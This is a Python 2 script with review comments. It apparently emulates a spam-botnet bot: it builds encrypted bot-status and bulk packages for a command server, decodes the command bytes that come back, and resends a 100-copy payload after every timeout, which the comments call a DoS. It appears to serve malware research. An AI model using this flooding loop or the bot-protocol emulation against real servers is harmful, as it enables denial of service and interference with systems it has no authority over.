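def generate_package(bid=0, bulkstate=1, dbg=False):
    """Build one outbound package: raw bot_rheader followed by an encrypted body.

    The body is one botbulk_info plus two serialized bulk_info entries, run
    through pencrypt(). Every structure is serialized with buffer(...)[:],
    which copies the object's bytes out as a str (Python 2; the structures are
    presumably ctypes Structures, given the buffer()/pointer()/cast() usage
    elsewhere in this file).

    Args:
        bid: bot id forwarded to init_bot_rheader().
        bulkstate: state value forwarded to init_bulk_info() for every entry.
        dbg: when true, hexdump each structure and the final package.

    Returns:
        The package as a str of bytes.

    Note: init_bulk_info, init_botbulk_info, init_bot_rheader, pencrypt,
    cprint and hexdump are module-level helpers defined outside this function.
    """
    # The original loop built exactly two bulk_info entries and then reused the
    # leaked loop index (i + 1 == 2) as the second init_botbulk_info() argument;
    # naming the count keeps the two in step and removes the dependency on a
    # loop variable surviving past its loop.
    num_bulk = 2

    # Serialize every entry and join once instead of growing a str in a loop.
    bulk_info_array = "".join(
        buffer(init_bulk_info(i, bulkstate))[:] for i in range(num_bulk)
    )

    botbulk_info = init_botbulk_info(1, num_bulk)

    # "20 + 8 * logsize" is taken from the original; what the constants encode
    # is not documented in this file.
    size = 20 + 8 * botbulk_info.logsize
    bot_rheader = init_bot_rheader(bid, size)

    # The header travels in the clear; only the body is encrypted. pencrypt()'s
    # second argument is presumably a length (main() passes len(buf) in that
    # position); here it is the header's size field rather than len(body) —
    # whether the two agree is up to init_bot_rheader(), not visible here.
    body = buffer(botbulk_info)[:] + bulk_info_array
    data = buffer(bot_rheader)[:] + pencrypt(body, bot_rheader.size)

    if dbg:
        # bulk_info_array is already a str, so it needs no buffer() round-trip.
        cprint("BOT_RHEADER\n", "yellow")
        print(hexdump(buffer(bot_rheader)[:]))
        cprint("BOTBULK_INFO\n", "yellow")
        print(hexdump(buffer(botbulk_info)[:]))
        cprint("BULK_INFO\n", "yellow")
        print(hexdump(bulk_info_array))
        cprint("Data Package\n", "yellow")
        print(hexdump(data))

    return data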
def main():
    """Connect to HOST:PORT, send 100 copies of a BOT_INFO struct, then echo replies.

    Flow as written: open a TCP socket with a 3 s timeout, fill a BOT_RHEADER,
    pencrypt() its raw bytes into bot_info.bufrecv, send 100 concatenated
    copies of bot_info, then loop on recv(). Each received chunk has its first
    byte matched against the RC_* constants, is hexdumped and appended to a
    buffer; when recv() times out the buffer is pdecrypt()-ed, printed and
    cleared, and the 100-copy payload is sent again. The loop ends only when
    the peer closes the connection.

    HOST, PORT, the RC_* constants, the BOT_* structures (presumably ctypes
    Structures, given buffer()/pointer()/cast()) and the helpers pencrypt,
    pdecrypt, cprint and hexdump are module-level names defined outside this
    block. Python 2 only: print statements and buffer().
    """
    # Socket configurations
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    # The 3 s timeout makes recv() raise socket.timeout, which the loop below
    # uses as its "end of burst" signal.
    s.settimeout(3.0) # Set 3s timeout

    # Connect — a refused/timed-out connect raises here and nothing closes the
    # socket on that path (no try/finally around the body).
    s.connect((HOST, PORT))

    cprint("\n[*] Sending data to " + HOST + " : " + str(PORT) \
            + " (hexdump below)\n", "green")

    # Initialise bot_info, bot_rheader, botbulk_info structures
    # (botbulk_info is constructed but never used after this point).
    bot_info = BOT_INFO()
    bot_rheader = BOT_RHEADER()
    botbulk_info = BOTBULK_INFO()

    # Populate bot_rheader structure
    bot_rheader.bid     = 0
    # 2886783745 == 0xAC10D301 == 172.16.211.1 (RFC 1918 private range); the
    # same address appears below as bot_info.ip in octal escapes.
    bot_rheader.iplocal = 2886783745 # Should be INT
    bot_rheader.botver  = 116
    bot_rheader.confver = 1
    bot_rheader.mfver   = 1
    bot_rheader.winver  = 1
    bot_rheader.flags   = 1
    bot_rheader.smtp    = 1
    # 32 matches bot_info.bufsize below; whether it equals the real
    # sizeof(BOT_RHEADER) cannot be checked from this file.
    bot_rheader.size    = 32

    # Conversion: Structure -> Bytes (Str)
    #bot_info.bufrecv = buffer(bot_rheader)[:] # Same as pack()
    bufrecv = buffer(bot_rheader)[:]
    # pencrypt()'s second argument is the plaintext length here.
    bufrecv_enc = pencrypt(bufrecv, len(bufrecv)) # Try encrypting

    # Populate bot_info structure
    # Octal escapes \254\020\323\001 are bytes 172, 16, 211, 1 -> 172.16.211.1.
    bot_info.ip                 = "\254\020\323\001" # char[4]
    #bot_info.have_ip            = 1
    bot_info.bufrecv            = bufrecv_enc
    bot_info.bufsize            = 32
    bot_info.bid                = 0
    
    # NOTE(review): the triple-quoted block below is a bare string expression,
    # not a comment — it is evaluated and discarded at runtime, so none of the
    # assignments inside it take effect. Left byte-for-byte as found.
    """
    bot_info.bufsend            = ""
    bot_info.bufdata            = ""
    bot_info.bufsmall           = 10000

    bot_info.id                 = 0
    bot_info.sd                 = 5
    bot_info.timer              = 2
    bot_info.state              = 2
    bot_info.blackliststatus    = 0
    bot_info.bshcommand         = 0

    bot_info.flags              = 0

    bot_info.botbulk            = pointer(botbulk_info)

    # Statistics
    bot_info.bsent              = 0
    bot_info.bnouser            = 0
    bot_info.bunlucky           = 0
    bot_info.bunksmtpansw       = 0
    bot_info.bblacklisted       = 0
    bot_info.bmailfrombad       = 0
    bot_info.bgraylisted        = 0
    bot_info.bnomx              = 0
    bot_info.bnomxip            = 0
    bot_info.bnoaliveip         = 0
    bot_info.bsmtptimeout       = 0
    bot_info.bconnect           = 0
    bot_info.brecv              = 0
    bot_info.bbotmailtimeout    = 0
    bot_info.bspammessage       = 0
    bot_info.bnohostname        = 0
    bot_info.blckmx             = 0

    bot_info.captcha_good       = 0
    bot_info.captcha_total      = 0

    refbulk = (c_byte * 4)()
    bot_info.refbulk            = cast(refbulk, POINTER(c_int))
    bot_info.refbulk_size       = 0
    """

    # Send: the hexdump shows one copy; sendall() pushes 100 concatenated
    # copies of the serialized struct in a single call.
    print hexdump(buffer(bot_info)[:])
    s.sendall(buffer(bot_info)[:] * 100)
    cprint("[+] Sent! Now waiting to receive data...\n", "green")

    # Initialise recv buffer (accumulates chunks until the next timeout)
    buf = ""

    # Listen on host. Only recv() == "" (peer closed) leaves this loop; any
    # other exception — socket.error on a reset, KeyboardInterrupt on Ctrl+C —
    # propagates out of main() without reaching s.close() below.
    while True:

        try:
            # Try receiving data (up to 1024 bytes; no framing is applied)
            rcvmsg = s.recv(1024)

            # Check whether connection is closed
            # NOTE(review): the next three lines are indented with a tab plus
            # spaces. Python 2 expands the tab to column 8 so they line up with
            # the surrounding 12-space indent; Python 3 rejects the mix
            # (TabError). Same for the `print hexdump(rcvmsg)` line further down.
	    if rcvmsg == "":
	        break
	
            # Got some data!
            sys.stdout.write("[+] Received: ")

            # Interpret command: the first byte of the chunk is taken as the
            # command id, regardless of where the chunk falls in the stream.
            cmd = ord(rcvmsg[0])

            # Unknown ids fall through silently — there is no else branch.
            if   cmd == RC_SLEEP:
                cprint("RC_SLEEP",      "cyan")
            elif cmd == RC_GETWORK:
                cprint("RC_GETWORK",    "cyan")
            elif cmd == RC_RESTART:
                cprint("RC_RESTART",    "cyan")
            elif cmd == RC_UPDATE:
                cprint("RC_UPDATE",     "cyan")
            elif cmd == RC_BID:
                cprint("RC_BID",        "cyan")
            elif cmd == RC_TEMPLATE:
                cprint("RC_TEMPLATE",   "cyan")
            elif cmd == RC_CONFIG:
                cprint("RC_CONFIG",     "cyan")
            elif cmd == RC_MAILFROM:
                cprint("RC_MAILFROM",   "cyan")
            elif cmd == RC_ACCOUNTS:
                cprint("RC_ACCOUNTS",   "cyan")

	    print hexdump(rcvmsg)

            # Store data in buffer (for later use)
            buf += rcvmsg

        except socket.timeout:

            # Timed out on receiving data: 
            # Let's check out the contents of recv buffer (if not empty)
            if buf:
                # Decrypt recv buffer (same length-as-second-argument
                # convention as pencrypt() above)
                dec = pdecrypt(buf, len(buf))
                print "[+] Decrypted:\n", dec, "\n"

                # Clear recv buffer
                buf = ""
                cprint("[*] Listening for incoming data (press Ctrl+C to quit)\n" \
                        , "green")
            
            # Re-send the same 100-copy payload after every timeout (the
            # author labels this a DoS). Because this runs on each timeout
            # with no counter or back-off, the script keeps flooding the peer
            # until the connection is closed from the other side.
            s.sendall(buffer(bot_info)[:] * 100)
            
    # Close socket — reached only via the `break` above.
    s.close()